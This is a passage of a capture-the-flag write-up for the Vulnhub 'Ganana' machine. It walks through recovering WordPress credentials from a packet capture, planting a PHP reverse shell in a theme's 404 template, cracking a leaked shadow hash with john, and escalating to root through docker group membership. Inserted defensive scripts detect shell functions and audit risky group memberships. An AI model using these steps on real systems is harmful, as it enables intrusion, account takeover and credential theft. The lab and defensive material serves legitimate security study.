==> DIRECTORY: http://192.168.56.163/wp-content/upgrade/                                                                                                                                                                                   
==> DIRECTORY: http://192.168.56.163/wp-content/uploads/                                                                                                                                                                                   

dirb also turned up another directory, /tasks:

┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ curl http://192.168.56.163/tasks     
Hey Jarret Lee!

Do manage the office as the admin is away for a few weeks! 
Admin has created an other temp account for you and details in a pcapng file. 

From this, the username is jarretlee.

Submitting this username to the login form confirms that it is a valid username.

/tasks says there is a pcapng file; guessing the name jarret.pcapng, download it to the Kali Linux machine and open it in Wireshark:

log=jarretlee&pwd=jarretLEE&redirect_to=http%3A%2F%2F192.168.3.109%2Fwp-admin%2F&testcookie=1
HTTP/1.1 200 OK
Date: Sun, 07 Jun 2020 08:45:15 GMT
Server: Apache
X-Powered-By: PHP/7.3.17
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/json; charset=UTF-8

{"success":false,"data":{"errors":"<ul class="tml-errors"><li class="tml-error">Error</strong>: The password you entered for the username jarretlee</strong> is incorrect. <a href="http://192.168.3.109/lostpassword/">Lost your password?</a></li></ul>"}}

This password is wrong, however, because the success field is false, so keep looking:

log=jarretlee&pwd=NoBrUtEfOrCe__R3Qu1R3d__&redirect_to=http%3A%2F%2F192.168.3.109%2Fwp-admin%2F&testcookie=1
HTTP/1.1 200 OK

This gives a username and password: jarretlee / NoBrUtEfOrCe__R3Qu1R3d__
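The reason the pcapng hands over the credentials is that the login went over plain HTTP on port 80, so every field of the form body, and the JSON reply that tells the client whether the password was accepted, is readable by anyone holding the capture. The following is an added example (not part of the original write-up) of a small triage routine a responder could run over such captured exchanges: it pairs each login submission with its response, reports the targeted account and the outcome, and never echoes the password. The sample exchanges are constructed to mirror the shape of the capture; the password values in them are placeholders.

```python
"""Triage of WordPress login attempts captured in cleartext HTTP.

Added example, not from the original write-up. Input is a list of
(destination port, request body, response body) triples; output is one
record per login attempt with the password replaced by its length.
"""
import json
from urllib.parse import parse_qs

# Constructed sample exchanges (placeholder passwords), same layout as the capture.
SAMPLE_EXCHANGES = [
    (80,
     "log=jarretlee&pwd=placeholder-guess&redirect_to=http%3A%2F%2F192.168.3.109%2Fwp-admin%2F&testcookie=1",
     '{"success":false,"data":{"errors":"<ul><li>The password you entered for the username jarretlee is incorrect.</li></ul>"}}'),
    (80,
     "log=jarretlee&pwd=placeholder-correct&redirect_to=http%3A%2F%2F192.168.3.109%2Fwp-admin%2F&testcookie=1",
     '{"success":true,"data":{}}'),
]


def parse_login_form(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded WordPress login body."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}


def login_succeeded(response_body: str):
    """Return the 'success' flag of the JSON login response, or None if it cannot be read."""
    try:
        return bool(json.loads(response_body).get("success"))
    except (ValueError, AttributeError):
        return None


def triage(exchanges) -> list:
    """One record per login submission; the password is reported only by length."""
    records = []
    for port, req_body, resp_body in exchanges:
        form = parse_login_form(req_body)
        if "log" not in form or "pwd" not in form:
            continue  # not a WordPress login submission
        records.append({
            "user": form["log"],
            "password_len": len(form["pwd"]),
            "success": login_succeeded(resp_body),
            "cleartext": port != 443,  # anything not on the TLS port is readable on the wire
        })
    return records


if __name__ == "__main__":
    for rec in triage(SAMPLE_EXCHANGES):
        print(rec)
```

The `cleartext` flag is the finding that matters for the defender: the fix is to serve wp-login.php only over HTTPS (port 443 is already open on this host) and to never store raw captures of login traffic in a web-accessible directory.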

Log in to the WordPress backend:

After logging in successfully, there is a post draft whose content is QGx3YXlzLUAtU3VwM3ItU2VjdXIzLXBAU1N3MFJkISE

┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ echo "QGx3YXlzLUAtU3VwM3ItU2VjdXIzLXBAU1N3MFJkISE" | base64 -d
@lways-@-Sup3r-Secur3-p@SSw0Rd!!base64: invalid input

Log in to phpMyAdmin with this password; the username is still jarretlee.

Change the password of the WordPress user charleywalker; it can be set to the same password as jarretlee's.

Now log in to the WordPress backend as charleywalker with the changed password.

charleywalker has more capabilities than jarretlee, so the next step is to get a PHP reverse shell script onto WordPress.

The method is to edit the 404 template, replacing its content with the code of shell.php.

Then, in a browser, visit any nonexistent page, such as http://192.168.56.163/xxxxx.php

A shell is obtained on Kali Linux.

Then switch to the jarretlee user; the password is the same as for WordPress.
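The foothold above works because an administrator-level WordPress account can rewrite theme PHP files from the browser, and Apache then executes whatever the 404 template contains. The following is an added example (not from the original write-up) of two checks a defender would run on such an installation: whether wp-config.php defines DISALLOW_FILE_EDIT (the WordPress constant that removes the in-browser theme and plugin editor), and a scan of theme sources for the PHP functions a web shell needs. All files below are constructed samples; the "tampered" 404.php merely references the suspicious functions and does nothing on its own.

```python
"""Detect theme-file tampering and the setting that prevents it.

Added example, not from the original write-up. Sample wp-config.php and
theme files are constructed inline.
"""
import re

# PHP functions that almost never belong in a theme template.
SUSPICIOUS_CALLS = (
    "fsockopen", "proc_open", "popen", "shell_exec", "exec", "system",
    "passthru", "eval", "base64_decode",
)
_CALL_RE = re.compile(r"\b(" + "|".join(SUSPICIOUS_CALLS) + r")\s*\(", re.IGNORECASE)
_DISALLOW_RE = re.compile(
    r"""define\s*\(\s*['"]DISALLOW_FILE_EDIT['"]\s*,\s*true\s*\)""", re.IGNORECASE)

# Constructed samples.
WP_CONFIG_WEAK = "<?php\ndefine('DB_NAME', 'wordpress');\n"
WP_CONFIG_HARDENED = WP_CONFIG_WEAK + "define('DISALLOW_FILE_EDIT', true);\n"

CLEAN_404 = "<?php get_header(); ?>\n<h1>Page not found</h1>\n<?php get_footer(); ?>\n"
TAMPERED_404 = (
    "<?php\n"
    "$sock = @fsockopen($host, $port);   // outbound connection from a template\n"
    "$p = proc_open('/bin/sh', $spec, $pipes);\n"
    "get_header();\n"
)


def file_editing_disabled(wp_config_src: str) -> bool:
    """True if wp-config.php defines DISALLOW_FILE_EDIT as true."""
    return _DISALLOW_RE.search(wp_config_src) is not None


def scan_php_source(src: str) -> list:
    """Return (line_number, function) for each suspicious call found in a PHP source."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        for m in _CALL_RE.finditer(line):
            hits.append((lineno, m.group(1).lower()))
    return hits


def audit_theme(files: dict) -> dict:
    """files: {relative path: source}. Returns only the files that have findings."""
    return {path: hits for path, src in files.items() if (hits := scan_php_source(src))}


if __name__ == "__main__":
    print("file editor disabled (weak config):", file_editing_disabled(WP_CONFIG_WEAK))
    print("file editor disabled (hardened):", file_editing_disabled(WP_CONFIG_HARDENED))
    print(audit_theme({"404.php": TAMPERED_404, "index.php": CLEAN_404}))
```

On a real installation, point `audit_theme` at the contents of wp-content/themes and compare the hits against a clean copy of the theme; the scanner is a triage aid and will also flag legitimate uses of these functions, so each hit needs a look. The authoritative fix is the DISALLOW_FILE_EDIT define together with file permissions that do not let the web server user write to theme directories.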

jarretlee@debian:~$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for jarretlee: NoBrUtEfOrCe__R3Qu1R3d__

Sorry, user jarretlee may not run sudo on localhost.
jarretlee@debian:~$ id
id
uid=1000(jarretlee) gid=1000(jarretlee) groups=1000(jarretlee)
jarretlee@debian:~$ ls
ls
jarretlee@debian:~$ ls -alh
ls -alh
total 32K
drwxr-xr-x 3 jarretlee jarretlee 4.0K Jun 25  2020 .
drwxr-xr-x 3       600 root      4.0K Jun 17  2020 ..
-rw------- 1 jarretlee jarretlee  177 Jun 17  2020 .backups
-rw------- 1 jarretlee jarretlee  515 Jun 25  2020 .bash_history
-rw-r--r-- 1 jarretlee jarretlee  220 Jun 17  2020 .bash_logout
-rw-r--r-- 1 jarretlee jarretlee 3.5K Jun 17  2020 .bashrc
drwx------ 3 jarretlee jarretlee 4.0K Jun 25  2020 .gnupg
-rw-r--r-- 1 jarretlee jarretlee  807 Jun 17  2020 .profile
jarretlee@debian:~$ cat .backups
cat .backups
amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6
jarretlee@debian:~$ 

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ echo "amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6" | base64 -d
jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1:18430:0:99999:7:::         

This is clearly jeevan's password hash (a shadow entry); crack it with john.

┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ echo "amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6" | base64 -d > jeevan_hashes
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ ls
jarret.pcapng  jeevan_hashes  mJENuxqo.atom  nmap_full_scan  shell.php
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt jeevan_hashes 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hannahmontana    (jeevan)     
1g 0:00:00:00 DONE (2022-11-08 05:40) 1.515g/s 3878p/s 3878c/s 3878C/s skyblue..hassan
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
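Two details of the sessions above deserve a closer look: the `base64: invalid input` that followed each decode (the strings were copied without their trailing `=` padding, so the decoder reported an error after emitting the data), and the shape of the decoded line, which is a complete shadow(5) record. The following is an added example (not from the original write-up) that decodes such a dump leniently and interprets the record: hash algorithm, iteration count (john reported the 5000-round sha512crypt default), and the last-change date encoded in the third field. The record is constructed with the same layout as the one in .backups; the hash value is a placeholder.

```python
"""Decode and interpret a base64-wrapped /etc/shadow entry.

Added example, not from the original write-up. The sample record below is
constructed (placeholder hash) and encoded without padding, the way the
string in .backups appeared.
"""
import base64
import binascii
from datetime import date, timedelta

# crypt(3) hash prefix -> algorithm.
CRYPT_ALGORITHMS = {
    "$1$": "md5crypt (obsolete)",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
    "$2b$": "bcrypt",
}

SAMPLE_SHADOW_LINE = "jeevan:$6$saltsalt$PLACEHOLDERHASHVALUE:18430:0:99999:7:::"
SAMPLE_B64 = base64.b64encode(SAMPLE_SHADOW_LINE.encode()).decode().rstrip("=")


def b64decode_lenient(text: str) -> bytes:
    """Decode base64 even when the trailing '=' padding was dropped."""
    text = text.strip()
    text += "=" * (-len(text) % 4)
    return base64.b64decode(text)


def parse_shadow_entry(line: str) -> dict:
    """Split a shadow(5) record into named fields and interpret the hash and dates."""
    parts = line.rstrip("\n").split(":")
    if len(parts) != 9:
        raise ValueError("shadow entry must have 9 colon-separated fields")
    name, pw, lastchg, _minage, maxage, _warn, _inactive, _expire, _ = parts
    algo = "unknown"
    for prefix, label in CRYPT_ALGORITHMS.items():
        if pw.startswith(prefix):
            algo = label
            break
    if pw in ("", "*") or pw.startswith("!"):
        algo = "locked / no password"
    # Field 3 is the day count since 1970-01-01 on which the password was last changed.
    last_changed = date(1970, 1, 1) + timedelta(days=int(lastchg)) if lastchg else None
    # sha512crypt without an explicit 'rounds=' parameter uses the 5000-iteration default.
    rounds = 5000 if pw.startswith("$6$") and "rounds=" not in pw else None
    return {
        "user": name,
        "algorithm": algo,
        "rounds": rounds,
        "last_changed": last_changed,
        "max_age_days": int(maxage) if maxage else None,
        "never_expires": maxage in ("", "99999"),
    }


def inspect_backup(b64_text: str) -> dict:
    """Decode a base64 dump such as the .backups file and parse the record."""
    return parse_shadow_entry(b64decode_lenient(b64_text).decode())


if __name__ == "__main__":
    try:
        base64.b64decode(SAMPLE_B64)  # strict decode fails on the missing padding
    except binascii.Error as exc:
        print("strict decode failed:", exc)
    print(inspect_backup(SAMPLE_B64))
```

For the record on this host, the third field (18430) decodes to 2020-06-17, which matches the timestamp of the .backups file itself; the 5000-round default and a wordlist password are why john finished in under a second. Raising the rounds (or moving to yescrypt) slows cracking, but the real defence is not copying shadow entries into a user's home directory at all.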

With jeevan's password cracked, switch to the jeevan user and find that jeevan belongs to the docker group.

jeevan@debian:/home/jarretlee$ sudo -l
sudo -l
[sudo] password for jeevan: hannahmontana

Sorry, user jeevan may not run sudo on localhost.
jeevan@debian:/home/jarretlee$ cd /home
cd /home
jeevan@debian:/home$ ls
ls
jarretlee
jeevan@debian:/home$ groups
groups
jeevan docker
jeevan@debian:/home$ docker images
docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
bash                latest              0980cb958276        2 years ago         13.1MB
alpine              latest              a24bb4013296        2 years ago         5.57MB
hello-world         latest              bf756fb1ae65        2 years ago         13.3kB
jeevan@debian:/home$ docker run -v /:/mnt -it bash
docker run -v /:/mnt -it bash
bash-5.0# whoami
whoami
root
bash-5.0# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
bash-5.0# cd /root
cd /root
bash-5.0# ls -alh
ls -alh
total 8K     
drwx------    2 root     root        4.0K May 29  2020 .
drwxr-xr-x    1 root     root        4.0K Nov  8 18:43 ..
bash-5.0# find / -name root.txt 2>/dev/null
find / -name root.txt 2>/dev/null
/mnt/root/root.txt
bash-5.0# cat /mnt/root/root.txt
cat /mnt/root/root.txt


                    _       _                 _                              _    
 __ __ __  ___     | |     | |      o O O  __| |    ___    _ _      ___     | |   
 \ V  V / / -_)    | |     | |     o      / _` |   / _ \  | ' \    / -_)    |_|   
  \_/\_/  \___|   _|_|_   _|_|_   TS__[O] \__,_|   \___/  |_||_|   \___|   _(_)_  
_|"""""|_|"""""|_|"""""|_|"""""| {======|_|"""""|_|"""""|_|"""""|_|"""""|_| """ | 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'./o--000'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 

bash-5.0# 
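The final escalation needed no exploit at all: membership of the docker group lets a user talk to the Docker daemon, which runs as root, and `docker run -v /:/mnt` bind-mounts the host filesystem into a container where the user is already root. The group is therefore root-equivalent and belongs in the same audit as sudoers. The following is an added example (not from the original write-up) that reads /etc/group and /etc/passwd contents and lists every non-root account holding such a membership, including primary-group membership, which /etc/group does not list. The file contents are constructed samples modelled on the accounts seen on this host.

```python
"""Audit group files for root-equivalent memberships.

Added example, not from the original write-up. The group and passwd
contents below are constructed samples.
"""
# Groups whose members can trivially obtain root on a typical host.
ROOT_EQUIVALENT_GROUPS = {
    "docker": "can start root containers that bind-mount the host filesystem",
    "lxd": "can launch privileged LXD containers with the host disk mounted",
    "disk": "can read and write raw block devices",
}

SAMPLE_GROUP = """\
root:x:0:
adm:x:4:syslog
disk:x:6:
docker:x:998:jeevan
jarretlee:x:1000:
jeevan:x:1001:
"""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
jarretlee:x:1000:1000::/home/jarretlee:/bin/bash
jeevan:x:1001:1001::/home/jeevan:/bin/bash
backup:x:34:6:backup:/var/backups:/usr/sbin/nologin
"""


def parse_group(text: str) -> dict:
    """Map group name -> (gid, set of supplementary members)."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def parse_passwd(text: str) -> dict:
    """Map user name -> primary gid (primary membership is not listed in /etc/group)."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        users[fields[0]] = int(fields[3])
    return users


def root_equivalent_members(group_text: str, passwd_text: str) -> dict:
    """Return {user: [reasons]} for every non-root user in a root-equivalent group."""
    groups = parse_group(group_text)
    primary = parse_passwd(passwd_text)
    findings = {}
    for gname, reason in ROOT_EQUIVALENT_GROUPS.items():
        if gname not in groups:
            continue
        gid, members = groups[gname]
        members = set(members) | {u for u, g in primary.items() if g == gid}
        for user in sorted(members - {"root"}):
            findings.setdefault(user, []).append(f"{gname}: {reason}")
    return findings


if __name__ == "__main__":
    for user, reasons in root_equivalent_members(SAMPLE_GROUP, SAMPLE_PASSWD).items():
        print(user)
        for r in reasons:
            print("  -", r)
```

On a live system feed it the contents of /etc/group and /etc/passwd; any account reported here should be treated as having root, and if that was not intended, the membership is removed or the daemon is switched to rootless mode.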

posted @ 2022-11-08 18:55  Jason_huawen